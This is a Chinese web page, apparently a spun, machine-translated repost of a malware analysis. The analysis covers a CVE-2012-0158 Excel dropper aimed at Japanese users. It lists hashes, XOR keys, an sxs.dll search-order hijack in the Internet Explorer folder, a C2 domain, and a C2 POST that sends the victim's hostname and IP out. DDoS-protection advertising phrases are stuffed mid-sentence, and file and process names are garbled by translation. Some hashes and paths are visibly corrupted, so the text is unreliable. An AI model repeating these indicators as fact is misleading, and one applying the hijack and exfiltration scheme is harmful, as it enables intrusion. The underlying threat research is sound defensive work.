当前位置:主页 > 网络安全 >

美国高防_专业网站防护_秒解封

时间:2021-07-16 17:20来源:E度网络 作者:E度网络 点击:

美国高防_专业网站防护_秒解封

在过去的几周里,赛伦斯实验室发现针对日本用户的目标文档激增。这些文件与最近有关中日两国在尖阁诸岛/钓鱼岛争议问题上日益紧张的世界新闻完全吻合。这些文件被定期发送给不同的用户和行业,使用各种新旧漏洞。中国经常否认与正在进行的网络攻击有任何关系;然而,两国之间持续不断的争端已经提高了双方的民族主义自豪感,并使两国处于紧张状态。我们决定分享我们的一些研究结果,希望能赋予维权者保护他们的系统。元信息:文件名:keikaku-201302.xls->翻译为Plan-201302 MD5:7ec89be945add54aa67009dbc12a9260 SHA1:1434a04f10c2162eab82703ef79e407dcbf5c30f SHA256:6d7b9f15cd8e3e75295e1c5ca46a360e2b45d7bea18444b1f54e127131d0文件大小:172564字节文档结构摘要信息:操作系统版本5.1大小:12713字节'Root Entry'(Root)8192字节{00020820-0000-0000-C000-000000046}'\x01CompObj'(stream)112字节'\x05DocumentSummaryInformation'(stream)72字节'Workbook'(stream)4733字节''u VBA_PROJECT_CUR'(存储)'PROJECT'(stream)424字节'PROJECTwm'(stream)62字节'VBA'(存储)'Sheet1'(流)1066字节"ThisWorkbook"(流)985字节"\u VBA_PROJECT"(流)2933字节"dir"(流)804字节"加密"(流)1522字节文件详细信息:该文件针对的是日本用户,并利用了2012年4月首次在野外使用的CVE-2012-0158。二进制文件在文档中使用单字节XOR键0x12编码,并跳过二进制文件的第一个字节(0x4D)。在成功利用该漏洞时,还会解码并加载一个空的伪文档,并将其存储在文件偏移量0x23C14处,单字节XOR密钥为0x97。滴管细节:文件大小:153600字节MD5:C266FAA587136328C939D2BB25EA7D42这个特定示例的有趣之处在于,专业防御ddos,解码后的二进制文件除了创建文件"C:\Program Files\Internet Explorer"之外什么也不做\sxs.dll. "的"sxs.dll"文件作为名为"数据"的资源存储在滴管中,带有中文代码页(2052)。后门利用了一个称为DLL搜索顺序劫持的漏洞。Internet Explorer在执行时将首先加载sxs.dll"在本地目录中存档,如何大家ddos防御系统,而不是合法的"sxs.dll"文件在system32目录,""%systemroot%\system32\"""。所以任何名为的文件sxs.dll"在同一目录中"进程名"二进制文件在将来的任何遭遇中都很可能是恶意的。调查人员应将此添加到已知DLL搜索顺序劫持位置的列表中,包括:%systemroot%\ntshuri.dll,%systemroot%\fxsst.dll,%systemroot%\链接信息.dll,和%systemroot%\midimap.dll.后门详情:文件大小:78336字节MD5:653C8AE41F0A008E3D31C13D92A038执行Internet Explorer时,文件将加载到进程的地址空间,并创建一个互斥体"myhorse\u ie_001"。后门导出一个名为"fuc\u trend"的函数。基于网络的指标:恶意软件将发出"DNS请求"www.dotaplayers.com网站看上去是一家合法的小型网站托管公司。恶意软件通过TCP端口80进行通信,使用与下面类似的HTTP请求。职务/jd/上传.aspx?filepath=info&filename={Hostname}{IP}.jpg HTTP/1.1主机:网站Accept:image/gif,image/x-xbitmap,防御cc攻击方法,image/jpeg,image/pjpeg,*/*接受语言:en-us内容类型:multipart/form data接受编码:gzip,什么是防御ccddos,deflate连接:保持活动缓存控制:无缓存用户代理:MyAgent内容长度:3112其中{Hostname}是受害系统的主机名,{IP}是系统的IP地址。当从C2服务器下载文件时,后门也将使用用户代理"mydownload"。基于主机的指标:恶意软件将创建文件%temp%\tmp.dat公司在编码并发送到POST请求正文之前收集基本系统信息。恶意软件还可能在%temp%目录中创建以下文件。命令{decimal value}.datmsuc.dat公司订单.dattmpxor.dat主机名:{HostName}IP:{IP}Proxy:(null)用户:Administrator SystemDir:C:\WINDOWS\system32操作系统语言版本:437系统版本:5.1 Service Pack 3(内部版本2600)进程:ID:4(?)ID:472(\SystemRoot\System32\短信服务.exe)编号:888(\??\C: \ WINDOWS\系统32\winlogon.exe)ID:932(C:\WINDOWS\system32\服务管理程序)ID:944(C:\WINDOWS\system32\lsass.exe文件)ID:1100(C:\WINDOWS\system32\主进程)ID:1364(C:\WINDOWS\System32\主进程)编号:1888(C:\WINDOWS\资源管理器.EXE)ID:188(C:\WINDOWS\system32\打印服务程序)ID:400(C:\Program Files\Parallels\Parallels)工具\服务\一致性.exe)ID:424(C:\Program Files\Parallels\Parallels Tools\Services\prl\Tools_服务.exe)ID:536(C:\Program Files\Parallels\Parallels Tools\Services\prl_工具.exe)ID:596(C:\WINDOWS\system32\主进程)ID:1572(C:\Program Files\Parallels\Parallels Tools\prl_抄送.exe)ID:1592(C:\WINDOWS\system32\输入法)编号:1656(C:\WINDOWS\system32\wscntfy.exe文件)ID:3284(C:\Program Files\Sandboxie)\SbieSvc.exe文件)ID:2052(C:\Program Files\Sandboxie)\SbieCtrl.exe)ID:2744(C:\WINDOWS\system32\命令提示符)编号:868(C:\Python26\python.exe)ID:3560(C:\Program Files\Internet Explorer\进程名)ID:1688(C:\Program Files\Internet Explorer\进程名)图1:"的示例内容"tmp.dat公司"如上图所示的数据首先被转换成Unicode,然后用"异或"对键`*&~^%@0hh8979进行编码,然后发送到C2服务器。结论此特定特洛伊木马的网络流量可以很容易地从代码中使用的静态用户代理(包括"MyAgent"和"mydownload")中识别出来。虽然这些攻击的范围似乎是有限的,但这种新颖的持久性方法无疑将被攻击者用于未来的恶意尝试。调查人员应认真调查任何名为的文件sxs.dll"""在与Internet Explorer相同的目录中。鼓励用户警惕使用".doc"或"xls"扩展名收到的任何附件。默认情况下,现代版本的Microsoft Office(2007+)将使用更新的Office Open XML格式保存文档,扩展名为".docx"或".xlsx"。赛伦斯实验室还没有在这些攻击中识别出一个利用OOXML格式的恶意office文档。

,海外高防cdn
推荐文章
最近更新